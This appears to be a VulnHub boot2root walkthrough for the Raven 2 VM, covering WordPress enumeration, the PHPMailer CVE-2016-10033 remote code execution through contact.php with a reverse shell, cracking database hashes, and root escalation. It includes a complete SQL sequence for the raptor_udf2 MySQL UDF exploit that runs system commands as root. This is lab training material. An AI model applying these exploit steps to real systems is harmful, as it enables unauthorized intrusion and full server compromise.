Raven: 2

[ vulnhub  boot2root  walkthrough  ]

Goal

4 flags

Download

https://www.vulnhub.com/entry/raven-2,269/

Walkthrough

Add the target to /etc/hosts and run nmap.

Port 80 is open by default, same as Raven 1.

dirb shows a WordPress instance (same as Raven 1) and a vendor directory.

Default WordPress instance with one post.

Two interesting notes from wpscan: it enumerates a user michael (same as Raven 1), and the uploads folder is browsable (directory listing is enabled).

The uploads folder holds flag 3, found nicely out of order on my part.

Checking the vendor directory, the PATH file stands out because of its modified date.

The PATH file holds flag 1.

I admittedly moved on from here and tried to brute-force SSH and WordPress, but with no luck,
and after much other enumeration couldn't find anything.

I did, however, find a form page at contact.php, but initially thought nothing of it.

Looking back at the vendor folder, though, it dawned on me that the contact page was probably related. So we know the site sends mail through PHPMailer, and we have the version being used.

Went to Google and found what I was looking for.

The second Google result, Exploit-DB 40974 (PHPMailer < 5.2.18 remote code execution, CVE-2016-10033), looked promising, so we copy it over to modify.

Looking at the exploit, we know we need to edit the script's settings, set up a listener, and run it with python3.

We set the target to the contact.php URL and rename the backdoor instead of keeping the original name. Then we just update the attacker's IP, the path the backdoor file is written to, and the backdoor file name. The path matters: the exploit smuggles extra sendmail arguments in through the From address, and sendmail's -X option writes the message transcript (which carries the PHP payload) to that path, so it has to be a location under the webroot that the web server user can write to and that will be served as PHP.

With our listener waiting for a connection on 4444 we run the exploit.
However, we need to install 'requests_toolbelt' first (pip install requests-toolbelt).

Sending again, it works.

We browse to the backdoor file so the PHP executes, then check our listener: the reverse shell is working.

Looking around, we find flag 2 just above the web directory, like in Raven 1.

Check the WordPress wp-config.php and we have the MySQL root password.

We first upgrade the bare reverse shell to an interactive TTY so the mysql client can be used properly.
Checking the database, we find password hashes for the WordPress users.

We're able to crack one hash with john.

Unfortunately the cracked password doesn't give system access, only WordPress access as steven.
There we find flag 3 again.

My normal enumeration includes running this script, when possible, to find escalation paths. So we download it, run it, and save the output to a file for review.

It's rare for the exploit suggestions to be the answer on VulnHub VMs, but after lots and lots of enumeration nothing else turned up, so I started investigating them. The MySQL exploit turned out to be a viable candidate given that we have MySQL root credentials.

Looking at Exploit-DB 1518 (raptor_udf2): it loads a shared object into the server as a user-defined function, so commands run with the privileges of the mysqld process, which on this box is root. Executed properly, that's enough to read a file as root (on a box where mysqld runs as an unprivileged mysql user this would only get you that user).

We copy the exploit source to prepare for transfer to the victim machine.
Watch for a copy-and-paste error where a '1' should be a lowercase 'l'; the -Wl,-soname flag in the exploit's build line is the usual victim.

Transfer the compiled .so file to the victim machine.

Then we just follow the rest of the exploit's instructions, with the goal of reading flag4.txt in the root folder.
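For reference, here is the 1518 (raptor_udf2) UDF sequence as it applies to this box, written out as an added example rather than taken from the page's screenshots or the exploit file itself. It assumes the compiled shared object was uploaded to /tmp/raptor_udf2.so, that the server's plugin directory is /usr/lib/mysql/plugin/ (check it first, the original exploit text uses /usr/lib/), and that mysqld runs as root, which the flag 4 result confirms on Raven 2.

```sql
-- Added example: Exploit-DB 1518 UDF technique as applied on Raven 2.
-- Assumed paths: /tmp/raptor_udf2.so (uploaded .so), /usr/lib/mysql/plugin/ (plugin_dir).

-- Preconditions to check before anything else: where the server loads plugins from,
-- and whether LOAD_FILE / INTO DUMPFILE are confined to a directory.
SHOW VARIABLES LIKE 'plugin_dir';        -- must match the DUMPFILE target below
SHOW VARIABLES LIKE 'secure_file_priv';  -- empty means unrestricted; a path here blocks this

USE mysql;

-- Stage the .so through a table so the server process (root), not our shell user,
-- is the one writing into the plugin directory.
CREATE TABLE foo(line BLOB);
INSERT INTO foo VALUES (LOAD_FILE('/tmp/raptor_udf2.so'));
SELECT * FROM foo INTO DUMPFILE '/usr/lib/mysql/plugin/raptor_udf2.so';

-- Register the exported do_system symbol as a UDF and confirm it is loaded.
CREATE FUNCTION do_system RETURNS INTEGER SONAME 'raptor_udf2.so';
SELECT * FROM mysql.func;

-- do_system() hands its argument to system() with mysqld's privileges, so write
-- the output somewhere our low-privilege shell can read it.
SELECT do_system('cat /root/flag4.txt > /tmp/flag4; chmod 644 /tmp/flag4');
\! cat /tmp/flag4

-- Leave the server as we found it.
DROP FUNCTION do_system;
DROP TABLE foo;
```

If secure_file_priv is set, the DUMPFILE step fails and this route is closed; on the MySQL 5.5 build here the variable is empty, which is why it works. The \! line is a mysql client escape to run a shell command, not SQL.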

The exploit worked and we have flag 4.

Written on April 20, 2019